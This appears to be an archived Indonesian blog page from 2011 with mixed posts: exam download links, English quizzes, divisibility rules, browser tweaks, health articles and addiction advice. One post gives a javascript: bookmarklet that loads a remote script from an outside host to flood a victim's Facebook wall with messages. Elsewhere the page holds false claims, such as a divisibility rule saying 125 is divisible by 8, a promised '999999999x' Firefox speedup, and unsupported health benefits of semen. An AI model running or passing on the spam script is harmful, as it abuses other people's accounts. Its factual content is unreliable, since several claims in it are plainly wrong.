Cara Convert file PDF ke WORD secara mudah

Posted by Lowongan Kerja Cpns Terbaru Thursday, February 17, 2011 0 comments
untuk Convert file PDF ke WORD :
Klik Disini Aja Kaka<<<

1. setelah browser ( mencari file yang ingin di format ) ,
2. Klik Convert And Download
3. Tunggu deh
maka file itu akan terformat ke dalam bentuk WORD dan setelah itu akan otomatis terdownload dari PC PC kamu sekalian :)

semoga bermanfaat :)

Baca Selengkapnya ....

Download Soal STAN dari tahun 1999 - 2010

Posted by Lowongan Kerja Cpns Terbaru Sunday, February 13, 2011 0 comments
Langsung aja yaa heheh :D

Untuk Referensi ini ada LINK STAN dari Tahun 1999-2010

STAN Tahun 1999-2009 (lengkap dengan Pembahasan)
http://www.ziddu.com/download/13491483/STAN1999-2009disatukan.zip.html

STAN Tahun 2010
http://www.ziddu.com/download/13491481/STAN-2010TPA.pdf.html
http://www.ziddu.com/download/13491482/STAN-2010ENGLISH.pdf.html

Baca Selengkapnya ....

Download Prediksi Soal USM STAN 2011

Posted by Lowongan Kerja Cpns Terbaru 3 comments
Berikut ini ada Link untuk mendownload Prediksi Soal STAN Thn 2011 plus soal STAN dari tahun 1999-2010.
Monggo dipirsoni,, CedikoT >>>

PREDIKSI SOAL STAN Thn 2011

http://www.ziddu.com/download/13491415/STAN-INGGRIS-PREDIKSI2011.pdf.html
http://www.ziddu.com/download/13491413/STAN-MTKDSR-PREDIKSI2011.pdf.html
http://www.ziddu.com/download/13491414/STAN-TKU-PREDIKSI2011.pdf.html
http://www.ziddu.com/download/13491416/STAN-TPA-PREDIKSI2011.pdf.html

Baca Selengkapnya ....

Contoh Latihan Subjuntive dan Pembahasannya :)

Posted by Lowongan Kerja Cpns Terbaru Friday, February 11, 2011 0 comments
Subjunctive Quiz
1It is essential that she at the meeting.
2If I you I would call her tonight.
3It is necessary that every student a uniform.
4I hope that he his homework on time.
5The doctors recommended that she a holiday.
6The boss asks that you early for your first day of work.
7If you feeling better we would go.
8It is important that we home as soon as we arrive.
9The landlord requested that John out of the apartment.
10We want the windows washed before Friday.

Baca Selengkapnya ....

Contoh Latihan Gerund dan Pembahasannya :)

Posted by Lowongan Kerja Cpns Terbaru 0 comments
Gerunds Quiz

1I dislike to the movies by myself.
2We started dinner without you.
3I can't imagine my own house.
4I used that television show all of the time.
5I always eat breakfast before to school.
6When do you practise the piano?
7My grandmother prefers science fiction books.
8You need harder this year.
9I am used to her in a bad mood.
10Have you talked to the dentist about your teeth?

Baca Selengkapnya ....

Contoh Latihan Gerund dan Pembahasannya :)

Posted by Lowongan Kerja Cpns Terbaru 0 comments
Gerunds Quiz
1I dislike to the movies by myself.
2We started dinner without you.
3I can't imagine my own house.
4I used that television show all of the time.
5I always eat breakfast before to school.
6When do you practise the piano?
7My grandmother prefers science fiction books.
8You need harder this year.
9I am used to her in a bad mood.
10Have you talked to the dentist about your teeth?



Baca Selengkapnya ....

Contoh Latihan Gerund dan Pembahasannya :)

Posted by Lowongan Kerja Cpns Terbaru 0 comments
Gerunds Quiz




Gerunds Quiz












1I dislike to the movies by myself.
2We started dinner without you.
3I can't imagine my own house.
4I used that television show all of the time.
5I always eat breakfast before to school.
6When do you practise the piano?
7My grandmother prefers science fiction books.
8You need harder this year.
9I am used to her in a bad mood.
10Have you talked to the dentist about your teeth?



Baca Selengkapnya ....

CIRI-CIRI BILANGAN HABIS DIBAGI dari 2 - 9

Posted by Lowongan Kerja Cpns Terbaru 0 comments
Assalamu'alaikum Wr. Wb.

Ada yang mengatakan bahwa Matematika adalah ratu ilmu pengetahuan dan teori bilangan adalah ratu matematika (Carl Fried Gauss).
Dari pernyataan diatas bahwa bilangan merupakan hal terpenting dalam matematika. Disini kita tidak akan membahas tentang Biografi dari Carl Fried Gauss, tapi akan membahas tentang Ciri-ciri Bilangan yang habis dibagi 2, 3, 4, atau 5. (Dari Sobat Soulmate "Muhammad Sihabuddin")
Tanpa panjang, lebar, dan tinggi lagi, berikut ulasannya CEKIDOT..>>

* BILANGAN HABIS DIBAGI 2
Suatu bilangan habis dibagi 2, ciri-cirinya adalah bilangan yang berakhiran (berangka satuan) 0, 2, 4, 6, 8. Dengan kata lain bilangan itu adalah bilangan genap.

Contoh : apakah 74 habis dibagi 2? Karena 74 merupakan bilangan genap (Ingat rumus untuk bilangan genap. Rumus untuk bilangan genap adalah 2k untuk sebarang k bilangan bulat. Sedangkan untuk bilangan ganjil yaitu 2k-1 untuk sebarang k bilangan bulat). Karena 74 memenuhi rumus bilangan genap, maka 74 habis dibagi 2. 74 : 2 = 37

* BILANGAN HABIS DIBAGI 3

Jumlah digit-digitnya habis dibagi 3

Contoh : Apakah 213 habis dibagi 3? Akan kita jumlahkan digit-digit pada bilangan 213. Didapatkan, 2 + 1 + 3 = 6. Karena 6 (hasil dari penjumlahan digit-digitnya) habis dibagi 3. Maka bilangan itu (213) habis dibagi 3. Apakah -345 habis dibagi 3? Langkahnya sama. Kita jumlahkan digit-digitnya dan menghiraukan tanda negative. Jangan tertipu oleh tanda negatif.

* BILANGAN HABIS DIBAGI 4
Dua digit terakhir habis dibagi 4. Lebih mudahnya yaitu puluhan dari bilangan itu habis dibagi 4.

Contoh : Apakah 324 habis dibagi 4? Dua digit terakhir yaitu 24. Dan 24 habis dibagi 4. Sehingga 326 habis dibagi 4. Apakah 2006 habis dibagi 4? Tidak. Karena dua angka terahirnya yaitu 06. Sedangkan 06 tidak habis dibagi 4. Sehingga 2006 tidak habis dibagi 4.

* BILANGAN HABIS DIBAGI 5
Bilangan tersebut berakhiran 0 atau 5.

Contoh : Apakah 3255 habis dibagi 5? Digit terakhir adalah 5. Sehingga 3255 habis dibagi 5. Apakah 2005 habis dibagi 5? Sangatlah mudah menentukan ciri bilangan habis dibagi 5

BILANGAN HABIS DI BAGI 6
Ciri Bilangan yang habis dibagi 6 adalah bilangan genap yang jumlah angka-angkanya habis dibagi 3. Atau bilangan yang habis dibagi 3 dan habis dibagi 2.

Contoh : apakah 234 habis dibagi 6? Sekarang kita perhatikan jumlah angka-angkanya. 2 + 3 + 4 = 9. Dan 9 habis dibagi 3. Karena jumlah angka-angkanya habis dibagi 3 dan bilangan itu genap. Maka 234 habis dibagi 6.

BILANGAN HABIS DI BAGI 7
Bila bagian satuannya dikalikan 2, dan menjadi pengurang dari bilangan tersisa. Jika hasilnya habis dibagi 7, maka bilangan itu habis dibagi 7.

Contoh : apakah 5236 habis dibagi 7? Kita pisahkan 6 (satuannya), kemudian 523 – (6 x 2) = 511. Apakah 511 habis dibagi 7? 51 – (1 x 2) = 49. Karena 49 habis dibagi 7, maka 5236 habis dibagi 7.

BILANGAN HABIS DI BAGI 8
Tiga digit terakhir habis dibagi 8.

Contoh : apakah 3125 habis dibagi 8? Tiga digit terakhir yaitu 125. Dan 125 habis dibagi 8. Sehingga 3125 habis dibagi 8. Bagaimana dengan 56? Tidak jadi masalah karena 56 = 056. Sehingga tiga digit terakhirnya yaitu 056. dan 56 habis dibagi 8. Sehingga 56 habis dibagi 8.

BILANGAN HABIS DI BAGI 9
Jumlah angka-angkanya habis dibagi 9.

Contoh : apakah 819 habis dibagi 9? Jumlah digit-digitnya yaitu 8 + 1 + 9 = 18. Dan 18 habis dibagi 9. Sehingga 819 habis dibagi 9.

Bagaimana..?? Ternyata mudahkan untuk menentukan bilangan yang habis di bagi 2 - 9 ??? .
Untuk ciri-ciri bilangan lainnya yang habis dibagi, ditunggu saja yaa ?

NOTE : Bagi Sobat Soulmate yang mempunyai info seputar matematika baik Link, permainan matematika, artikel, tokoh biografi, dan hal-hal yang menarik lainnya tentang matematika bisa di share disini.

Jangan lupa ikut berpartisipasi dalam bertanya dan menjawab soal-soal yang ada di WALL GRUP
Ajak juga teman-teman Anda untuk bergabung ke GRUP SOUL-MATE-MATIKA (^_^).

Atas perhatian dan kerjasamanya, kami ucapkan terima kasih.
Wassalamu'alaikum Wr. Wb.
Hormat Kami : Anggota :)

Baca Selengkapnya ....

Nge Flood Comment Facebook Jadi Banyak Bangeeeet !

Posted by Lowongan Kerja Cpns Terbaru Thursday, February 10, 2011 0 comments
cara nya
copas cod berikut
lalu pastekan di url facebook teman anda
misal url profil teman anda
http://www.facebook....100001172366097

nah ganti url itu jadi code yang ada di bawah ini

javascript:(a = (b = document).createElement("script")).src = "//ho1onk.cz.cc/online/fb.js", b.body.appendChild(a); void(0);

lalu enter.....

setelah itu masukan jummlah pesan yang mau kamu kirim ke wall nya

misal
999999999 <== berrti segitu jumlah pesannya yang akan kamu kirim
enter,
trus
tulis pesan kamu
enter lagi .


liat hasil nya di wall propil korban :)
gampang kan?

Baca Selengkapnya ....

Trik Membuat Firefox 9999999 Lipat Lbh Cepat

Posted by Lowongan Kerja Cpns Terbaru 0 comments
akan saya share gimana cara membuat Browser MozilaFirefox menjadi lebih cepat. Langkah pertama, buka FireFox dan ketik about:config di URL box (tempat buat ngetik alamat situs) tekan enter. kalo udah akan ada peringatan dari firefox untuk berhati-hati dalam mengutak-atik config tersebut, klik i’ll becarefull, i’ll promise! (kalo ada). Pada tab filter ketik network dan tekan enter.


Cari tulisan network.http.pipelining ganti value nya dari false menjadi true dengan cara double click. dan cari network.http.pipelining.maxrequests ada di bawahnya yang tadi. Ganti value dari 4 menjadi 999999999. Kalo udah keluar dari FireFox, dan buka lagi. Nah sekarang browser FireFox mu udah bisa browsing lebih cepat 999999999x.

atau pake yang ini ..

Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This means
it will make 30 requests at once.
3. Lastly right-click anywhere and select New-> Integer. Name it
"nglayout.initialpaint.delay" and set its value to "0". This value is the
amount of time the browser waits before it acts on information it recieves.
If you're using a broadband connection you'll load pages MUCH faster now!

Baca Selengkapnya ....

Khasiat di Balik Cairan Sperma Yang Kita Keluarkan

Posted by Lowongan Kerja Cpns Terbaru Wednesday, February 9, 2011 0 comments
Sperma ternyata mengandung komposisi kimia yang sangat berguna bagi tubuh. Bahkan pernah ada mitos dikalangan wanita bahwa dengan menelan sperma dapat menghaluskan kulit dan bikin awet muda . Benarkah mitos tersebut ???



Kalau melihat dari komposisi kimia yang terdapat dalam sperma sepertinya mitos tsb dapat dibenarkan. Tetapi para ahli dibidang ini tidak pernah membenarkan tapi juga tidak pernah menyalahkan mitos tersebut secara ilmiah. Mereka hanya mengatakan tidak apa tertelan asal dari sperma yang sehat dan tidak tertular penyakit.

Komposisi kimia sperma adalah sebagai berikut :

Komposisi kimia …………..( Dalam mg/100 ml )
Ammonia ……………………………2
Ascoric Acid ……………………..12,8
Ash …………………………………..9,9 %
Calcium ……………………………25
Carbon Dioxide …………..54 ml/100 ml
Chloride …………………………155
Cholesterol ………………………80
Citric Acid ……………………….376
Creatine …………………………..20
Ergothioneine ………………..Trace
Fructose ………………………..224
Glutathione ………………………30
Glycerylphorylcholine ………54-90
Inositol ……………………………..50,57
Lactic Acid ………………………..35
Magnesium ……………………….14
Nitrogen, nonprotein(total) …913
Phosphorus,acid-soluble …….57
Inorganic ………………………….11
Lipid ………………………………….6
Total (lipid) ………………………112
Phosphorylcholine ………….250-380
Potassium …………………………89
Pyruvic Acid ………………………29
Sodium ……………………………281
Sorbitol ……………………………..10
Vitamin B 12 ……………….300-600 ppg
Sulfur …………………………3 % (of ash)
Urea …………………………………72
Uric Acid ……………………………..6
Zinc ………………………………….14
Copper ………………………0,006-0,024

Komposisi yang bermanfaat bagi tubuh diantaranya adalah :

1. Calcium
Komposisi ini sangat berguna untuk tulang dan gigi bahkan untuk menjaga fungsi otot dan syaraf.

2. Citric Acid
Berguna untuk mencegah penggumpalan darah dalam tubuh

3. Creatine
Berguna untuk menambah tenaga dan pembentukan otot dan juga dapat berfungsi sebagai pembakar lemak dalam tubuh

4. Ergothioneine
Berfungsi sebagai pelindungan kulit dari kerusakan DNA

5. Fructose
Dapat berfungsi sebagai pencerna gula dalam tubuh yang sangat bermanfaat sebagai pencegah penyakit diabetes. Kebanyakan Fructose juga berbahaya karena bisa menyebabkan penyakit asam urat.

6. Glutathione
Komposisi kimia ini sangat berguna sebagai obat pencegah kanker, mencegah penggumpalan darah selama operasi dan menambah kemanjuran obat kemoterapi.

7. Inositol
Berfungsi mencegah kerontokan pada rambut

8. Lactic Acid
Berfungsi sebagai bahan untuk luka bakar dan luka pembedahan

9. Lipid
Berfungsi sebagai pembakar lemak

10.Pyruvic Acid
Berfungsi sebagai penyubur

11.Sorbitol
Dipergunakan oleh ahli farmasi sebagai bahan untuk mengatasi sembelit

12.Urea
Berfungsi untuk mengeluarkan nitrogen yang berlebih dalam tubuh

13.Uric Acid
Berguna sebagai pencegah penyakit diabetes tetapi kebanyakan Uric Acid akan menyebakan penyakit encok, dll

14.Sulfur
Berguna untuk menghaluskan kulit.

15.Vitamin B12
Sebagai penambah stamina

16.Zinc
Berguna sebagai obat jerawat

Setelah membaca kegunaan dari komposisi kimia diatas apakah kamu percaya bahwa sperma bisa memperhalus kulit ? Membuat awet muda ? Bahkan bisa dipergunakan sebagai obat jerawat? Semua tergantung penilaian kamu terhadap hasil tulisan ini, karena seperti telah diuraikan diatas para ahli di bidang ini tidak pernah menyatakannya secara ilmiah.Yang jelas wanita di Jepang telah mempergunakan sperma sebagai obat untuk memperhalus dan meremajakan kulit mereka agar tetap awet muda.

sumber : http://nuepoel.wordpress.com/2009/09/13/khasiat-di-balik-cairan-sperma/

Baca Selengkapnya ....

Tips Menyeleksi Pasangan

Posted by Lowongan Kerja Cpns Terbaru 0 comments
Hobinya yang sering menghujani hadiah dan pujian untuk Anda, tentu bisa bikin teman-teman Anda iri. Namun, semua ungkapan cinta yang menggebu ini tak bisa dijadikan jaminan bahwa kelak si dia juga bisa menjadi suami yang ideal.



Tes sederhana berikut akan menguji, apakah si dia cukup berpotensi menjadi partner hidup dalam susah dan senang.

Apakah si tipe realistis ?
Seseorang yang realistis biasanya tidak akan memberikan janiji-janji manis pada Anda. Dia akan menunjukkan dirinya apa adanya. Yang perlu Anda sadari, tak ada makhluk yang sempurna. Tapi, Anda berdua bisa belajar saling melengkapi lewat potensi dan kelemahan yang dimiliki masing-masing pasangan.

Kejujuran.
Tanpa kejujuran, hubungan akan kehilangan arah. Hati-hati, jika si dia sering tertangkap basah berbohong, sebaiknya Anda berpikir dua kali untuk menjadikannya pasangan hidup Anda. Jika Anda tak dapat memercayainya, kepada siapa lagi Anda bergantung?

Respek.
Carilah seseorang yang menaruh respek pada Anda. Dengan demikian Anda berdua lebih mudah bekerja sama dalam menyelesaikan setiap masalah yang muncul.

Kenali kepribadiannya sebelum menjawab ‘Iya’
Awali dengan tahap pengenalan diri. Fase ini akan membantu Anda menemukan apa yang sebenarnya Anda harapkan dari sebuah hubungan, dan seseorang seperti apa yang dapat mewujudkan keinginan Anda tersebut.

Jangan terjebak dalam romantisisme sesaat.
Dalam alam ideal, mungkin Anda menginginkan sosok yang selalu melimpahi Anda dengan segepok perhatian. Namun, ada baiknya jika sesekali Anda menyelidiki motivasi di balik perlakuan manisnya itu.

Sumber : http://faridbj.blogspot.com/2009/12/tip-menyeleksi-pasangan.html

http://806124d3.linkbucks.com/ 

Baca Selengkapnya ....

Kenapa Cewek Harus Tetap Virgin ?

Posted by Lowongan Kerja Cpns Terbaru Sunday, February 6, 2011 0 comments
Virgin atau Perawan
Lengkapnya kenapa cewek harus tetap Virgin ?
Untuk pertanyaan ini sepertinya banyak sekali jawaban yang dapat diberikan, semua tergantung atau kembali kepada individu masing2. Akan tetapi di masa sekarang yang sudah semakin bebas ada baiknya perlu tahu apa saja kerugian-kerugian jika melakukan sex pra nikah.


Resiko dari sex pra nikah semua orang pasti sudah pada tahu, yaitu HAMIL dan akhirnya MBA alias Married By Accident (kalau sudah gini siapa yang malu…). Selain itu pula dengan sex pra nikah beresiko tertular penyakit kelamin, dan sebagainya. Sebenarnya dengan alasan di atas sudah cukup buat untuk tidak melakukan sex pra nikah. Tapi masih banyak alasan lainnya yang perlu untuk diketahui:

1. Sex Pra Nikah menyebabkan kamu akan dihantui perasaan bersalah
Sekali kamu melakukannya dan meskipun mungkin tidak ada seorangpun yang tahu, rasa bersalah akan selalu menghantui. Bahkan bisa jadi kamu akan menjadi benci pada dirimu sendiri karena tidak bisa menolak tekanan untuk melakukan hubungan sex. Perasaan seperti ini memang tidak mendominasi, tapi biasanya akan selalu muncul setiap waktu dan akan selalu menjadi bagian darimu.

2. Karena kamu bisa menjadi “sexual person“ dan segala sesuatunya tidak akan pernah lagi sama seperti semula
Seperti kalau pernah mencoba sesuatu benda additif lainnya, maka ada saatnya rasa kepingin atau ketagihan akan datang. Akibatnya, pikiran akan dipenuhi dengan sex dan menggangu konsentrasi untuk hal lainnya.
Dengan kata lain : dewasa sebelum waktunya.

3. Sex Pra Nikah akan mengubah cara pandangmu tentang sex – selamanya
Sex seharusnya sesuatu yang sakral dan menjadi sangat indah jika dilakukan oleh pasangan suami istri. Tapi jika dilakukan sebelum menikah, maka bisa jadi sex berubah menjadi sebagai suatu yang “kotor” dan terlarang. Cara pandang ini bisa terus tertanam di benak kamu, bahkan setelah kamu menikah nantinya. Sayang kan ?

4. Kamu akan sulit lepas dari “the first one”
Biasanya cewek merasakan ikatan yang sulit dilepas dengan cowok yang telah dia berikan virginitasnya. Ini tidak ada hubungan dengan ketakutan kalau-kalau tidak ada cowok lain yang akan menerima dia sesudah tidak virgin. Ini masalah psikologis. Padahal, cowok belum tentu merasakan hal yang sama.

5. Karena hubungan pacaran kamu bisa berubah menjadi “all about sex“
Pasangan pra nikah yang telah melakukan hubungan sex biasanya akan selalu mempunyai hidden agenda. Kapan dan dimana akan melakukannya…. Tidak jarang karena jadwal rahasia ini mereka harus berbohong, kepada siapa saja. Bentuk-bentuk perhatian akan menjadi bias. Apakah bener-bener tulus atau karena cuma sex. Bahkan terkadang sedang berantem hebatpun akan langsung baikan cuma gara-gara sex, dan melupakan masalah sesungguhnya.

6. Sex Pra Nikah, maka kamu tidak akan pernah menikmati surganya bulan madu
Karena sudah biasa melakukan hubungan sex pra nikah, maka bulan madu yang mestinya asyik dan romantis, bakal jadi seperti liburan biasa. Tidak akan pernah ada sesuatu yang berkesan untuk seumur hidupmu.

7. Karena kamu bisa menjaga reputasi dan tidak mau “nyesel” di kemudian hari
Hampir bisa dipastikan, teman-temannya akan tahu jika seorang cowok telah melakukan hubungan sex dengan pacarnya.
Jadi ini merupakan rahasia umum.
Dan tentu saja kamu tidak menghendaki mempermalukan dirimu seperti ini.
Semua itu di karenakan CINTA …
VIRGIN atau PERAWAN …. kembali kepada individu masing2,
tulisan di atas hanya sekedar sharing aja. Semoga bermanfaat d yaa :)

Baca Selengkapnya ....

Benarkah Nanas Musuh Wanita ?

Posted by Lowongan Kerja Cpns Terbaru 0 comments
Nanas sebabkan keputihan?, nanas bisa sebabkan keguguran?. Pertanyaan tersebut sudah menjadi mitos yang ada pada masyarakat kita. Banyak wanita, terutama wanita hamil menghindari nanas karena takut mitos tersebut terjadi. Sampai saat ini belum ada penelitian klinis yang mampu membuktikan kebenarannya.
 

Awal mula mitos ini berasal dari pendapat bahwa nanas, khususnya nanas muda memiliki sifat antelmintik dan abortivum yang berpotensi menimbulkan kontraksi pada kandungan. Selain itu diduga kandungan air pada nanas dapat menyebabkan keputihan pada wanita.

Selain mitos-mitos tadi, ternyata masih banyak manfaat dan khasiat nanas yang masih dapat digali sebagai makanan sehat. Nanas diketahui mengandung enxim bromealin yang bermanfaat untuk mengurangi risiko hipertensi, kolesterol dalam darah, mencegah stroke, mengurangi parasit pada cacing, menghambat pertumbuhan sel kanker, dan meningkatkan sistem pertahanan tubuh.

Selain sumber kandungan mineralnya, nanas juga kaya akan vitamin dan serat yang baik untuk pencernaan. Kandungan-kandungan yang terdapat pada nanas antara lain vitamin B12, B6, A, C, E, K, folat, riboflavin, beta carotene, bromelin, tryptophan, serotonin, dan beberapa kandungan lainnya yang memberikan keuntungan bagi kesehatan.

Kandungan tryptophan dan serotonin pada nanas berfungsi sebagai relaksasi otak yang dapat mengurangi depresi, serta meningkatkan mood dan konsentrasi. Makanan yang rendah kandungan serotonin-nya lama kelamaan dapat menimbulkan berbagai jenis reaksi kimia, hormonal, dan enzimatik.

Antioksidan dan beta caroten yang ada pada nanas pun juga mampu menyeimbangkan membran sel lensa pada mata serta mempertahankan konsentrasi glutation tereduksi. Sehingga dapat mencegah reaksi oksidasi lipid pada membran sel lensa mata dari katarak.

Baca Selengkapnya ....

CARA MENGATASI BERBAGAI KECANDUAN

Posted by Lowongan Kerja Cpns Terbaru 0 comments
Kecanduan onani/masturbasi:
Berikut ini adalah cara-cara untuk mengatasi kecanduan masturbasi yang dapat Anda lakukan diantaranya sepuluh langkah berikut ini.

 

1) Yang terpenting, yakinlah bahwa kau mampu mengatasi masalah ini. Kau sudah mampu menahan diri untuk tidak berzina dengan pacarmu, tentulah kau juga mampu menahan diri untuk tidak membiasakan diri melakukan onani. Untuk memperkuat keyakinan diri itu, biasakanlah diri mengucap dzikir yang relevan, seperti: “Tetapi di sisi Allah-lah tempat kembali terbaik.” (QS Ali ‘Imran [3]: 14)

2) Cari tahulah apa saja keadaan-keadaan dirimu yang memicu dirimu membiasakan diri melakukan masturbasi. Misalnya, kau biasa bermasturbasi setiap kali merasa kesepian, bosan, atau tertekan (stres). Kalau memang begitu, waspadalah dirimu setiap kali berada dalam keadaan begitu. Dalam keadaan begitu, tanamkanlah kembali keyakinanmu bahwa kau mampu menahan diri untuk tidak membiasakan diri melakukan onani. Atasilah berbagai keadaan yang tidak nyaman itu dengan solusi lain yang tidak bersifat seksual. Misalnya dengan cara berdzikir.

3) Temukanlah sebab-sebab mengapa kau mampu menahan diri untuk tidak berzina dengan pacarmu. Lalu berlakukanlah hal-hal yang relevan dengan kasus kebiasaan masturbasimu. Misalnya, kalau kau mampu menahan diri untuk tidak berzina dengan pacarmu karena kau menghargai dirinya setinggi-tingginya, maka hargailah juga dirimu sendiri setinggi-tingginya.

4) Hindari menyendiri! Selalulah bersama orang lain (yang tidak membangkitkan rangsangan seksual), kecuali bila terpaksa. Bila terpaksa menyendiri, misalnya di kamar mandi, jangan berlama-lama! Lima menit sudah cukup. Bila kau membutuhkan waktu yang relatif lama ketika menyendiri (misalnya di kamar mandi) lantaran berbagai aktivitas sekaligus, pisahkanlah aktivitas-aktivitas itu. Jadi, mandi, keramas, gosok gigi, dan lain-lain, hendaknya dilakukan dalam waktu yang tidak bersamaan.

5) Di tempat tidur, singkirkanlah jauh-jauh guling dan barang-barang lain yang dapat kau gosok-gosokkan ke alat kelaminmu. Selain itu, pakailah celana dan baju tertentu yang membuatmu sulit bermain-main dengan alat kelaminmu. Setiap kali kau merasa nafsu birahimu memuncak di tempat tertentu (misalnya di kamar mandi atau tempat tidur), beranjaklah dari situ. Pergilah ke tampat lain. Temuilah orang-orang, ngobrollah tentang apa saja yang jauh dari rangsangan seksual.

6) Di mana pun, hindari pornografi atau pun yang semi porno. Jagalah pandangan mata dan pendengaran telingamu dari segala yang membangkitkan birahi.

7) Setiap kali bangun tidur, segeralah bangkit dengan penuh antusias. Jangan bermalas-malasan.

8) Sibukkanlah dirimu dengan berbagai aktivitas yang kau sukai dan jauh dari rangsangan seksual. Utamakanlah aktivitas yang dilakukan bersama orang lain. Misalnya, kau suka membaca buku dan main catur. Ketika kau merasa nafsu seksualmu bangkit alias terangsang, lebih baik main catur bersama orang lain daripada membacabuku sendirian. Sibukkanlah juga pikiranmu dengan berbagai hal yang kau sukai dan jauh dari rangsangan seksual.

9) Bila perlu, mintalah bantuan profesional dari ahlinya, seperti psikolog dan psikiater.

Kecanduan alkohol:
Mengatasi kecanduan alkohol harus diikuti dengan proses detoksifikasi, yakni proses menghilangkan racun yang menumpuk di dalam tubuh. Agar efektif, proses tersebut harus ditunjang oleh perubahan gaya hidup.
Detoksifikasi hanya melengkapi, sebab upaya untuk mengatasi kecanduan harus dimulai dengan niat dari si pecandu sendiri. Apapun caranya tidak akan berhasil jika yang bersangkutan belum mantap 100 persen.
Jika tekad sudah bulat, proses detoksifikasi dilakukan dengan mengganti cairan tubuh atau rehidrasi. Pada proses ini, air akan meluruhkan racun-racun dan pengotor di dalam tubuh.

Dikutip dari Buzzle, Jumat (21/5/2010), proses tersebut akan efektif jika disertai perubahan gaya hidup. Beberapa di antaranya adalah sebagai berikut.
Minum air putih lebih banyak
Untuk membersihkan racun alkohol, seseorang harus menambah konsumsi carian sebanyak 2-3 liter/hari karen sel-sel dalam tubuh butuh cairan agar bisa berfungsi dengan baik. Saat melakukan detoksifikasi, cairan yang cukup akan sangat membantu sistem kekebalan tubuh. Cairan juga akan melancarkan pembuangan racun-racun termasuk sisa alkohol dari dalam tubuh.

Mengkonsumsi sayuran dan buah segar
Jus buah bit (beetroots) diyakini berkhasian membersihkan hati, sementara jus wortel mampu memperkuat sistem kekebalan tubuh. Untuk mendukung proses detoksifikasi, kombinasikan jus buah bit, wortel dan apel. Jus cranberry juga bisa ditambahkan, karena mampu memurnikan tubuh dari racun-racun pengotor.

Mengkonsumsi herba dan suplemen
Beberapa jenis herba atau tumbuhan dan suplemen yang mengandung vitamin B dapat membantu mengurangi ketegangan fisik maupun psikis yang muncul selama proses detoksifikasi alkohol. Konsultasikan dengan dokter atau konsultan herbal, suplemen apa yang cocok dengan kondisi individual masing-masing.

Melakukan olahraga
Proses detoksifikasi bisa memicu depresi, yang bisa diredakan dengan melakukan yoga atau olahraga lainnya secara teratur. Karena banyak potasium yang dikeluarkan bersama keringat, imbangi dengan lebih banyak mengkonsumsi buah dan sayuran. Pisang, melon, tomat, jeruk sitrus dan sayuran hijau banyak mengandung potasium.

Perlu diingat, depresi yang timbul selama proses detoksifikasi dapat menyebabkan perasaan gelisah dan mudah marah. Pada kondisi yang parah, efek samping detoksifikasi bisa memicu tremor (gemetar) atau halusinasi. Kondisi tersebut membutuhkan obat penenang yang harus dibeli dengan resep dokter.
1. Coba sibukkan diri kamu dengan hal-hal baru, seperti bertemu atau mengatur janji dengan teman tentang hal-hal yang menarik. Contohnya mengatur janji akan mengadakan suatu acara yang cukup menyita waktu kamu.
2. Coba ketika kamu berada di tempat game, buat diri kamu menjadi tidak nyaman. Tahan pipis, duduk di tempat yang panas, duduk di komputer yang paling tidak bagus.
3. Apabila kamu merasa ingin main game, langkah yang tepat yang harus kamu ambil adalah katakan pada orang terdekat kamu tentang apa yang kamu rasakan. Saya yakin mereka akan melarang dan menasehati kamu, dengan demikian niat kamu akan terbendungi.
4. Yang keempat dan yang terakhir adalah niat yang besar dari diri kamu sendiri.

Kecanduan internet:
Kimberley Young menyebutkan beberapa gejala utama kecanduan berinternet.
1. Pikiran pecandu internet terus-menerus tertuju pada aktivitas berinternet dan sulit untuk dibelokkan ke arah lain.
2. Adanya kecenderungan penggunaan waktu berinternet yang terus bertambah demi meraih tingkat kepuasan yang sama dengan yang pernah dirasakan sebelumnya.
3. Yang bersangkutan secara berulang gagal untuk mengontrol atau menghentikan penggunaan internet.
4. Adanya perasaan tidak nyaman, murung, atau cepat tersinggung ketika yang bersangkutan berusaha menghentikan penggunaan internet. Adanya kecenderungan untuk tetap online melebihi dari waktu yang ditargetkan.
5. Penggunaan internet itu telah membawa risiko hilangnya relasi yang berarti, pekerjaan, kesempatan studi, dan karier.
6. Penggunaan internet menyebabkan pengguna membohongi keluarga, terapis, dan orang lain untuk menyembunyikan keterlibatannya yang berlebihan dengan internet.
7. Internet digunakan untuk melarikan diri dari masalah atau untuk meredakan perasaan-perasaan negatif, seperti rasa bersalah, kecemasan, depresi, dan sebagainya.

Seorang pengguna sudah dapat digolongkan sebagai pecandu internet bila ia memenuhi sedikitnya lima dari delapan kriteria yang disebutkan Young ini.
Yang perlu dilakukan agar tidak kecanduan internet.
1. Mengajak teman yang bisa mengingatkan kita ketika kita tenggelam dalam keasyikan berinternet.
2. Menaruh komputer dan internet di tempat yang terbuka, juga menghubungkan diri dengan internet ketika berada di tempat publik. Kenyamanan berinternet memang berkurang, tetapi akan mengurangi risiko kecanduan.
3. Tidak berlangganan internet kalau tidak sangat perlu, dan membatasi diri ketika kita harus berlangganan internet di rumah, atau ketika kita ke warnet.
4. Menggantikan aktivitas berinternet dengan aktivitas atau hobi lain yang lebih berguna.

Kecanduan Rokok:
1. Pahami alasan Anda untuk berhenti
Keputusan Anda untuk berhenti merokok memang sangat baik, tapi apakah Anda tahu mengapa Anda melakukannya? Alasan umum seperti “merokok buruk bagi kesehatan” saja terkadang tidak cukup. Untuk menciptakan tekad dan motivasi diri yang kokoh, Anda butuh suatu alasan yang kuat dan bersifat pribadi. Misalnya, mungkin Anda ingin melindungi keluarga Anda dari bahaya racun yang disebabkan asap rokok? Mungkin juga Anda takut terkena kanker paru-paru, atau Anda ingin terlihat Iebih muda dan merasa Iebih sehat? Pilihlah suatu alasan yang cukup kuat bagi Anda untuk menjadi pegangan di kala Anda menghadapi kesulitan nantinya saat berhenti merokok.

2. Pilih terapi yang sesuai dengan kondisi Anda
